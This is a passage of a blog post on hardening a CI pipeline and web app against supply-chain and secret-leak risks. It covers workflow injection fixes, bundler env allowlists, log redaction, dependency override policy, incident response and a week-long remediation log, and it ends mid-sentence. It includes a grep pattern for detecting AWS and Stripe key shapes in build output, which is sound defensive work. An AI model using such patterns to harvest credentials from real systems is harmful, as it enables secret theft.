&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;BODY&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}&lt;/span&gt;
&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;$BODY"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the boundary the lede sat on. The fix was a four-line diff. The control that catches the next one (&lt;code&gt;actionlint&lt;/code&gt; for syntax + &lt;code&gt;zizmor&lt;/code&gt; for security patterns, both as required PR checks) was one commit. Cross-CI: &lt;code&gt;semgrep --config=p/ci&lt;/code&gt; covers most major vendors with one ruleset.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 3. Runtime-side: what ships and what leaks
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; a &lt;code&gt;define&lt;/code&gt; block in your bundler (Vite, Webpack, esbuild, Rollup) that spreads &lt;code&gt;process.env&lt;/code&gt; into the client bundle. Frontend bundlers replace &lt;code&gt;process.env.X&lt;/code&gt; with the value at build time, so whatever was in the build host's env becomes a string literal in the JS shipped to every browser.&lt;/p&gt;

&lt;p&gt;We had this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// vite.config.ts&lt;/span&gt;
&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// TODO: fix this later&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env.PUBLIC_API_URL&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;PUBLIC_API_URL&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="c1"&gt;// explicit allowlist; nothing implicit&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same principle for &lt;code&gt;NEXT_PUBLIC_*&lt;/code&gt;, &lt;code&gt;VITE_*&lt;/code&gt;, &lt;code&gt;REACT_APP_*&lt;/code&gt;, &lt;code&gt;EXPO_PUBLIC_*&lt;/code&gt; env vars: assume browser-readable, never put secrets behind these prefixes. Same failure mode in mobile too: Android &lt;code&gt;BuildConfig.API_KEY = "$apiKey"&lt;/code&gt; from a checked-in &lt;code&gt;gradle.properties&lt;/code&gt;; iOS API keys in &lt;code&gt;Info.plist&lt;/code&gt; or &lt;code&gt;xcconfig&lt;/code&gt;. Assume any string in the artefact is extractable.&lt;/p&gt;
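
&lt;p&gt;A cheap tripwire behind that assumption (patterns and paths are illustrative): scan the emitted bundle for secret-shaped strings and fail the build on a hit.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# In CI you would run: grep -rEn "$PATTERN" dist/ and exit 1 on a match.
# Extend the pattern with your providers' key shapes.
PATTERN='AKIA[0-9A-Z]{16}|sk_live_[0-9a-zA-Z]+'
# Demo on two sample bundle lines, one benign and one AWS-access-key-shaped:
printf '%s\n' \
  'const api = "https://api.example.com";' \
  'const key = "AKIAIOSFODNN7EXAMPLE";' \
  | grep -En "$PATTERN"
# prints: 2:const key = "AKIAIOSFODNN7EXAMPLE";
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;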

&lt;h4&gt;
  
  
  Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; logging frameworks default to verbose. CloudWatch, Datadog, Sentry retain log lines for weeks. A &lt;code&gt;console.log(req)&lt;/code&gt; in a request handler dumps the &lt;code&gt;Authorization&lt;/code&gt; header to a 30-day-retention log, accessible to any engineer with read access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; redaction at the framework level (not per call-site):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="nx"&gt;pino&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;pino&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;logger&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;pino&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;redact&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.cookie&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;config.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// catches Axios errors&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.password&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.token&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.secret&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="na"&gt;censor&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;[REDACTED]&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The one that bit us: AxiosError objects carry the original request configuration, including &lt;code&gt;Authorization&lt;/code&gt; headers. &lt;code&gt;logger.error(msg, axiosErr)&lt;/code&gt; without redaction quietly dumps every bearer token your service has ever forwarded.&lt;/p&gt;

&lt;p&gt;Every mature logger has the primitive: &lt;code&gt;structlog&lt;/code&gt; processors (Python), &lt;code&gt;logback&lt;/code&gt;'s &lt;code&gt;MaskingPatternLayout&lt;/code&gt; (Java), &lt;code&gt;zap&lt;/code&gt; / &lt;code&gt;zerolog&lt;/code&gt; field hooks (Go), &lt;code&gt;tracing&lt;/code&gt; field filters (Rust), &lt;code&gt;Rails.config.filter_parameters&lt;/code&gt; (Ruby), &lt;code&gt;Serilog.Enrichers.Sensitive&lt;/code&gt; (.NET). Last line of defence regardless of stack: an &lt;strong&gt;OpenTelemetry Collector&lt;/strong&gt; with an &lt;code&gt;attributes/delete&lt;/code&gt; processor that scrubs in transit before logs reach Datadog or CloudWatch.&lt;/p&gt;
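
&lt;p&gt;A Collector-config fragment for that last line of defence (the attribute keys are examples; match the ones your instrumentation actually emits):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;processors:
  attributes/scrub:
    actions:
      - key: http.request.header.authorization
        action: delete
      - key: http.request.header.cookie
        action: delete

service:
  pipelines:
    logs:
      processors: [attributes/scrub]   # receivers/exporters elided
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;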

&lt;p&gt;&lt;strong&gt;The limit.&lt;/strong&gt; &lt;code&gt;pino&lt;/code&gt; redact is a denylist; it only scrubs the paths you list. Custom auth headers (&lt;code&gt;x-api-key&lt;/code&gt;, &lt;code&gt;x-vault-token&lt;/code&gt;), GraphQL &lt;code&gt;variables.password&lt;/code&gt;, &lt;code&gt;request.body.token&lt;/code&gt;, provider-specific shapes are all easy to miss. Audit your redact paths against the actual headers and body shapes your services see, and re-audit when you add an integration.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; vulnerable transitive dependency, no maintainer response, can't wait.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; force-pin the transitive with documented rationale and an expiry date:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"overrides"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"lodash-es"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"4.17.23"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"tar"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"7.5.11"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every package manager has the primitive: npm &lt;code&gt;overrides&lt;/code&gt;, yarn &lt;code&gt;resolutions&lt;/code&gt;, pip &lt;code&gt;constraints.txt&lt;/code&gt;, Poetry direct-promotion, uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;, Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;, Gradle &lt;code&gt;resolutionStrategy.force&lt;/code&gt;, Cargo &lt;code&gt;[patch.crates-io]&lt;/code&gt;, Go &lt;code&gt;replace&lt;/code&gt;, Bundler direct gem pin, NuGet central package management.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Override-rot is real:&lt;/strong&gt; outdated overrides shadow newer transitive versions that already have the fix. Each override should reference its CVE, the introducing PR, and a re-evaluation date. The &lt;code&gt;audit-allowlist.json&lt;/code&gt; schema we use:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"ghsa"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"GHSA-xxxx-yyyy-zzzz"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"package"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"the affected package"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"severity"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"high | critical"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"rationale"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"why this risk is accepted (must explain reachability or absence of fix)"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"verified_by"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"engineer email or handle"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"added"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"expires"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;max&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;90&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;days&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"follow_up"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"what removes this entry"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;CI fails when &lt;code&gt;expires&lt;/code&gt; passes; the gate forces a re-decision rather than letting drift accumulate.&lt;/p&gt;
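&lt;p&gt;The gate itself is a few lines. This sketch is an assumed script, not a published tool; the field names follow the schema above, and in CI it would read &lt;code&gt;audit-allowlist.json&lt;/code&gt; from disk:&lt;/p&gt;

```javascript
// Sketch of the expiry gate: collect every allowlist entry whose `expires`
// date has passed, so CI can fail and force the re-decision.
function expiredEntries(allowlist, today = new Date()) {
  return allowlist.filter((entry) => new Date(entry.expires) < today);
}

// Illustrative entries (GHSA ids are placeholders):
const allowlist = [
  { ghsa: "GHSA-aaaa-bbbb-cccc", package: "lodash-es", expires: "2099-01-01" },
  { ghsa: "GHSA-dddd-eeee-ffff", package: "tar", expires: "2020-01-01" },
];

const stale = expiredEntries(allowlist);
for (const entry of stale) {
  console.error(`allowlist entry for ${entry.package} (${entry.ghsa}) expired ${entry.expires}`);
}
// In the real gate: `if (stale.length > 0) process.exit(1);`
```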




&lt;h2&gt;
  
  
  When prevention fails: the response side
&lt;/h2&gt;

&lt;p&gt;Every boundary above is preventive. Some will fail. The question is what you do in the next four hours.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Forensic record.&lt;/strong&gt; Retain CI build logs for at least 90 days, forwarding them to an immutable sink (S3 with Object Lock, or a logging platform with retention). Without this, "did the malicious axios version run for us during the window?" is unanswerable. GitHub-hosted runners are ephemeral; once a job finishes, the host is gone. Pre-configure log shipping and an artifact upload of suspicious-run state.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Provenance lookup.&lt;/strong&gt; &lt;code&gt;rekor-cli search --artifact &amp;lt;digest&amp;gt;&lt;/code&gt; answers "did our pipeline sign this digest?" &lt;code&gt;gh attestation verify&lt;/code&gt; answers it for GitHub-attested artifacts. &lt;strong&gt;OSV-Scanner&lt;/strong&gt; retroactively queries your lockfile against advisory windows ("did we have axios 1.14.x in a build between March 30 12:00 UTC and 15:00 UTC?"). &lt;strong&gt;GUAC&lt;/strong&gt; (Graph for Understanding Artifact Composition) builds a queryable provenance graph across artifacts. &lt;strong&gt;Trivy&lt;/strong&gt; + &lt;strong&gt;Grype&lt;/strong&gt; drive SBOM-based scanning post-incident; &lt;strong&gt;Dependency-Track&lt;/strong&gt; is the consumption side. An SBOM you don't continuously diff against vulnerability feeds is a compliance artefact, not a control.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OIDC token revocation playbook.&lt;/strong&gt; Know how to invalidate cached OIDC subject claims. Know which AWS role trust policies to tighten. Know how to query Sigstore Rekor for "did we sign this digest during the suspect window?" All process documentation, not tooling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Secret rotation in dependency order.&lt;/strong&gt; If CI is suspect, rotation order matters. Start at the leaves (npm publish tokens, third-party SaaS keys), then deploy roles, then DB credentials. Rotating root credentials first invalidates the OIDC tokens you'd need to rotate the leaves. Document who calls whom; security incidents are a bad time to discover ambiguity.&lt;/p&gt;
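&lt;p&gt;The leaves-first rule is a reverse walk of the credential dependency graph. A sketch with hypothetical credential names, where an edge means "rotating this needs that to still be valid":&lt;/p&gt;

```javascript
// Hypothetical credential graph: rotating an npm publish token or a SaaS key
// needs a live OIDC deploy role; rotating the deploy role needs root creds.
const needs = {
  "npm-publish-token": ["oidc-deploy-role"],
  "saas-api-key": ["oidc-deploy-role"],
  "oidc-deploy-role": ["aws-root-creds"],
  "aws-root-creds": [],
};

// Leaves-first order: everything that depends on a credential rotates before
// the credential itself (a reverse topological sort).
function rotationOrder(graph) {
  const order = [];
  const seen = new Set();
  function visit(name) {
    if (seen.has(name)) return;
    seen.add(name);
    for (const [dependent, deps] of Object.entries(graph)) {
      if (deps.includes(name)) visit(dependent); // dependents rotate first
    }
    order.push(name);
  }
  for (const name of Object.keys(graph)) visit(name);
  return order;
}

console.log(rotationOrder(needs)); // tokens and keys, then deploy role, then root
```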

&lt;p&gt;&lt;strong&gt;Image quarantine.&lt;/strong&gt; ECR lifecycle policy plus an admission-controller tag-block on the suspected window's digests. Until your &lt;code&gt;cosign verify&lt;/code&gt; says the digest you're running is the digest you signed, treat anything from that window as suspect.&lt;/p&gt;

&lt;p&gt;Prevention buys time for detection. Detection buys time for response. Get all three in writing before you need them.&lt;/p&gt;




&lt;h2&gt;
  
  
  What one week of focused work actually moved
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Third-party Action SHA pinning&lt;/td&gt;
&lt;td&gt;0% of 110 &lt;code&gt;uses:&lt;/code&gt; lines&lt;/td&gt;
&lt;td&gt;100% with &lt;code&gt;pinact&lt;/code&gt; CI gate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow &lt;code&gt;permissions: write-all&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;8 of 16 workflows&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lockfile integrity coverage&lt;/td&gt;
&lt;td&gt;99.97% (1 off-registry tarball, no &lt;code&gt;integrity:&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;99.97% + CI allowlist enforcement with rationale per off-registry entry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;12 hours&lt;/td&gt;
&lt;td&gt;3 days&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production Dockerfile USER directive&lt;/td&gt;
&lt;td&gt;0 of 7 (all root)&lt;/td&gt;
&lt;td&gt;7 of 7 (non-root)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production base image digest pinning&lt;/td&gt;
&lt;td&gt;0 of 7&lt;/td&gt;
&lt;td&gt;7 of 7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image signing&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;cosign keyless on every ECR push, workflow-path-anchored verify identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time secret scanning&lt;/td&gt;
&lt;td&gt;pre-commit only (skippable)&lt;/td&gt;
&lt;td&gt;pre-commit + CI (unskippable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time SAST&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CodeQL &lt;code&gt;security-extended&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow security audit&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dependency CVE gate&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pnpm audit --prod --audit-level high&lt;/code&gt; with documented allowlist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SBOM generation&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CycloneDX + SPDX on every push to main&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The week wasn't a checklist. It was a sequence of specific findings, in the order I hit them:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 7.&lt;/strong&gt; Audit of &lt;code&gt;.github/workflows/&lt;/code&gt;. Every external &lt;code&gt;uses:&lt;/code&gt; was tag-pinned. Pinned all 110 to 40-character SHAs with tag comments. &lt;code&gt;pinact run --check --verify&lt;/code&gt; added as required status check.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 8.&lt;/strong&gt; 8 of 16 workflows ran with &lt;code&gt;permissions: write-all&lt;/code&gt;. Tightened to workflow-level &lt;code&gt;permissions: {}&lt;/code&gt; plus per-job grants. &lt;code&gt;zizmor&lt;/code&gt; added as the gate. &lt;strong&gt;First staging deploy broke&lt;/strong&gt; because &lt;code&gt;permissions: {}&lt;/code&gt; revealed an undeclared &lt;code&gt;packages: read&lt;/code&gt; that a publish job had been silently inheriting through the old &lt;code&gt;write-all&lt;/code&gt;. Caught in PR; one-line add to per-job permissions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 9.&lt;/strong&gt; The &lt;code&gt;opencode-review.yml:108&lt;/code&gt; CWE-78 (the lede). Four-line fix.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 10.&lt;/strong&gt; &lt;code&gt;apps/front/remote-homepage/vite.config.ts:30&lt;/code&gt; had &lt;code&gt;'process.env': process.env,&lt;/code&gt; with a TODO comment. Every CI environment variable visible to the build host was being baked into the client bundle. Replaced with an explicit allowlist.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 8.&lt;/strong&gt; &lt;code&gt;build-and-publish-service.yml&lt;/code&gt; lines 128 and 469: both Wiz container scan steps had &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. Doubly non-blocking. Two engineers had deliberately typed those bypasses; this wasn't config drift. Removed both.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 3.&lt;/strong&gt; Lockfile audit found one off-registry tarball: &lt;code&gt;https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz&lt;/code&gt;, in two lambda &lt;code&gt;package.json&lt;/code&gt; files. Allowlisted with rationale (SheetJS withdrew xlsx from npm in 2023).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 12.&lt;/strong&gt; &lt;code&gt;pnpm.overrides&lt;/code&gt; audit; the lodash story below.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 2.&lt;/strong&gt; &lt;code&gt;minimumReleaseAge&lt;/code&gt; calibration: started at 720 minutes (12 hours), tried 10080 (7 days), got blocked by a &lt;code&gt;postcss@8.5.12&lt;/code&gt; patch published four days earlier, settled at 4320 (3 days).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 5.&lt;/strong&gt; Production Dockerfile sweep. 7 of 7 images ran as root. Added &lt;code&gt;USER node&lt;/code&gt;; switched nginx-fronted images to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 5: Boundary 6.&lt;/strong&gt; Cosign keyless signing on every ECR push. Branch protection updated to require all six new gates as status checks.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The DX cost, honestly.&lt;/strong&gt; PR-time latency went from p50 4m / p95 9m to p50 6m / p95 14m. CodeQL &lt;code&gt;security-extended&lt;/code&gt; is the long pole at ~7m. False-positive rate after the first week of tuning: zizmor ~5%, gitleaks ~2% with the project-tuned config. Two engineers asked for a &lt;code&gt;--no-verify&lt;/code&gt; escape hatch on &lt;code&gt;pinact&lt;/code&gt; early on; we declined. One pushed back hard enough that I owed him a 1:1 walking through the tj-actions chain. The friction is real and you should plan for the conversation. Fast-path bypass: a &lt;code&gt;security-bypass&lt;/code&gt; label requires CODEOWNERS approval, expires on merge, audit-logged.&lt;/p&gt;




&lt;h2&gt;
  
  
  Five lessons that don't fit in a framework
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. The "patched version" you find in an advisory is not always the version you can ship.
&lt;/h3&gt;

&lt;p&gt;Day 4. The advisory for GHSA-r5fr-rjxr-66jc (HIGH, code injection via &lt;code&gt;_.template&lt;/code&gt;) said "fixed in 4.18.0." Our &lt;code&gt;pnpm.overrides&lt;/code&gt; had &lt;code&gt;lodash-es: 4.18.0&lt;/code&gt; and &lt;code&gt;lodash: 4.18.1&lt;/code&gt;, both flagged green by the advisory.&lt;/p&gt;

&lt;p&gt;Then I checked the npm registry page. 4.18.0 was marked as a deprecated "Bad release." We were pinned to a withdrawn version, which is its own kind of supply-chain debt. The current stable was 4.17.23. The patch wasn't in it.&lt;/p&gt;

&lt;p&gt;I kept the terminal open and ran:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
